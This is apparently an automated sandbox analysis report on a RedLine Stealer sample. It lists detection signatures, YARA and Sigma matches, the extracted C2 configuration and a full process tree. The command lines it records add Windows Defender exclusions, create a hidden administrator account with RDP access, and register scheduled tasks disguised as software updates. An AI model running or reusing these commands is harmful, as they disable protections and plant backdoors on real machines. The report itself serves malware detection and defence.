Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8lOT1rXZp5.exe

Overview

General Information

Sample name:8lOT1rXZp5.exe
renamed because original name is a hash value
Original sample name:34807a743f2d680eef051852eaef0b16.exe
Analysis ID:1581194
MD5:34807a743f2d680eef051852eaef0b16
SHA1:4e63843e9c51f907952bb2f51d6b3866f81f7bd6
SHA256:02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Adds a new user with administrator rights
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides user accounts
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Obfuscated command line found
Potential malicious VBS script found (has network functionality)
Potential malicious VBS script found (suspicious strings)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Add User to Remote Desktop Users Group
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Add User to Local Administrators Group
Sigma detected: New User Created Via Net.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 8lOT1rXZp5.exe (PID: 6776 cmdline: "C:\Users\user\Desktop\8lOT1rXZp5.exe" MD5: 34807A743F2D680EEF051852EAEF0B16)
    • makecab.exe (PID: 5316 cmdline: "C:\Windows\System32\makecab.exe" MD5: 00824484BE0BCE2A430D7F43CD9BABA5)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4600 cmdline: "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3428 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • findstr.exe (PID: 1740 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Rifiutare.exe.com (PID: 5700 cmdline: Rifiutare.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)
          • Rifiutare.exe.com (PID: 2896 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D MD5: 78BA0653A340BAC5FF152B21A83626CC)
            • RegAsm.exe (PID: 4284 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • findstr.exe (PID: 2708 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Uno.exe.com (PID: 5216 cmdline: Uno.exe.com f MD5: 78BA0653A340BAC5FF152B21A83626CC)
          • Uno.exe.com (PID: 1508 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f MD5: 78BA0653A340BAC5FF152B21A83626CC)
            • RegAsm.exe (PID: 3332 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • findstr.exe (PID: 6432 cmdline: findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • Inebriato.exe.com (PID: 1856 cmdline: Inebriato.exe.com R MD5: 78BA0653A340BAC5FF152B21A83626CC)
          • Inebriato.exe.com (PID: 5232 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R MD5: 78BA0653A340BAC5FF152B21A83626CC)
            • RegAsm.exe (PID: 5020 cmdline: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • cmd.exe (PID: 2932 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 1888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 180 cmdline: powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 1284 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 2248 cmdline: powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 5272 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 4020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 5324 cmdline: powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 5548 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3120 cmdline: powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • cmd.exe (PID: 5804 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cscript.exe (PID: 1860 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs MD5: CB601B41D4C8074BE8A84AED564A94DC)
              • cmd.exe (PID: 3760 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cscript.exe (PID: 6148 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: CB601B41D4C8074BE8A84AED564A94DC)
              • cmd.exe (PID: 6256 cmdline: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 6304 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53" MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 4228 cmdline: C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cscript.exe (PID: 6504 cmdline: cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" MD5: CB601B41D4C8074BE8A84AED564A94DC)
              • cmd.exe (PID: 6756 cmdline: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 6900 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79" MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 6988 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 3332 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • WMIC.exe (PID: 5344 cmdline: wmic group where sid="S-1-5-32-544" get name /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
                • cmd.exe (PID: 3264 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • WMIC.exe (PID: 1004 cmdline: wmic group where sid="S-1-5-32-555" get name /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
                • net.exe (PID: 3624 cmdline: net user fsUIwEqMAc zyTFxcsIkA /add MD5: 31890A7DE89936F922D44D677F681A7F)
                  • net1.exe (PID: 1016 cmdline: C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
                • net.exe (PID: 4364 cmdline: net localgroup Administrators fsUIwEqMAc /add MD5: 31890A7DE89936F922D44D677F681A7F)
                  • net1.exe (PID: 4412 cmdline: C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
                • net.exe (PID: 1628 cmdline: net localgroup "Remote Desktop Users" fsUIwEqMAc /add MD5: 31890A7DE89936F922D44D677F681A7F)
                  • net1.exe (PID: 5212 cmdline: C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
                • net.exe (PID: 6760 cmdline: net accounts /maxpwage:unlimited MD5: 31890A7DE89936F922D44D677F681A7F)
                  • net1.exe (PID: 1784 cmdline: C:\Windows\system32\net1 accounts /maxpwage:unlimited MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
                • reg.exe (PID: 3084 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
        • PING.EXE (PID: 6740 cmdline: ping 127.0.0.1 -n 30 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • wscript.exe (PID: 6964 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 3604 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2784 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 4476 cmdline: wmic group where sid="S-1-5-32-544" get name /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1340 cmdline: C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • WMIC.exe (PID: 5252 cmdline: wmic group where sid="S-1-5-32-555" get name /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • wscript.exe (PID: 6972 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 2116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • fsutil.exe (PID: 3796 cmdline: fsutil dirty query C: MD5: DE00EDA7134D3365E6074700E3008CAD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["21jhss.club:80"], "Bot Id": "adsbb"}
SourceRuleDescriptionAuthorStrings
00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000009.00000003.1972771955.0000000004640000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x150c8:$a1: ttp://checkip.amazonaws.com/logins.json
      • 0x14e60:$a2: https://ipinfo.io/ip%appdata%\
      • 0x153a0:$a3: Software\Valve\SteamLogin Data
      • 0x11458:$a4: get_ScannedWallets
      • 0x102ed:$a5: get_ScanTelegram
      • 0x11073:$a6: get_ScanGeckoBrowsersPaths
      • 0xf03a:$a7: <Processes>k__BackingField
      • 0xd51c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0xe95b:$a9: <ScanFTP>k__BackingField
      • 0x110fa:$a10: DataManager.Data.Credentials
      00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          Click to see the 12 entries
          SourceRuleDescriptionAuthorStrings
          9.3.Rifiutare.exe.com.4680aa0.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            9.3.Rifiutare.exe.com.4680aa0.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              9.3.Rifiutare.exe.com.4680aa0.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
              • 0x12e40:$a1: ttp://checkip.amazonaws.com/logins.json
              • 0x12bd8:$a2: https://ipinfo.io/ip%appdata%\
              • 0x13118:$a3: Software\Valve\SteamLogin Data
              • 0xf1d0:$a4: get_ScannedWallets
              • 0xe065:$a5: get_ScanTelegram
              • 0xedeb:$a6: get_ScanGeckoBrowsersPaths
              • 0xcdb2:$a7: <Processes>k__BackingField
              • 0xb294:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
              • 0xc6d3:$a9: <ScanFTP>k__BackingField
              • 0xee72:$a10: DataManager.Data.Credentials
              9.3.Rifiutare.exe.com.4680aa0.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
              • 0xd6dc:$gen03: get_UserDomainName
              • 0xf719:$gen04: get_encrypted_key
              • 0xf14f:$gen06: GetBrowsers
              • 0xea19:$gen07: get_InstalledInputLanguages
              • 0xc38b:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
              • 0x133d0:$spe6: windows-1251, CommandLine:
              • 0x1010a:$spe9: *wallet*
              • 0xb114:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
              • 0xb20f:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
              • 0xb51c:$typ03: A937C899247696B6565665BE3BD09607F49A2042
              • 0xb690:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
              • 0xb177:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
              • 0xb1c9:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
              • 0xb323:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
              • 0xb5ba:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
              • 0xb615:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
              9.3.Rifiutare.exe.com.4680aa0.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0xc1ef:$u7: RunPE
              • 0xf5d0:$u8: DownloadAndEx
              • 0x133e8:$pat14: , CommandLine:
              • 0xec6f:$v2_1: ListOfProcesses
              • 0xc3cf:$v2_2: get_ScanVPN
              • 0xc472:$v2_2: get_ScanFTP
              • 0xd0f3:$v2_2: get_ScanDiscord
              • 0xe049:$v2_2: get_ScanSteam
              • 0xe065:$v2_2: get_ScanTelegram
              • 0xe137:$v2_2: get_ScanScreen
              • 0xedb3:$v2_2: get_ScanChromeBrowsersPaths
              • 0xedeb:$v2_2: get_ScanGeckoBrowsersPaths
              • 0xf12d:$v2_2: get_ScanBrowsers
              • 0xf1d0:$v2_2: get_ScannedWallets
              • 0xf1f6:$v2_2: get_ScanWallets
              • 0xf216:$v2_3: GetArguments
              • 0x11e69:$v2_3: GetArguments
              • 0xd916:$v2_4: VerifyUpdate
              • 0x11eb7:$v2_4: VerifyUpdate
              • 0xf44a:$v2_5: VerifyScanRequest
              • 0x11e82:$v2_5: VerifyScanRequest
              Click to see the 12 entries

              System Summary

              barindex
              Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, CommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D, ParentImage: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com, ParentProcessId: 2896, ParentProcessName: Rifiutare.exe.com, ProcessCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ProcessId: 4284, ProcessName: RegAsm.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentImage: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe, ParentProcessId: 5020, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""", ProcessId: 2932, ProcessName: cmd.exe
              Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.199.111.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6972, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49842
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, CommandLine: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6988, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup "Remote Desktop Users" fsUIwEqMAc /add, ProcessId: 1628, ProcessName: net.exe
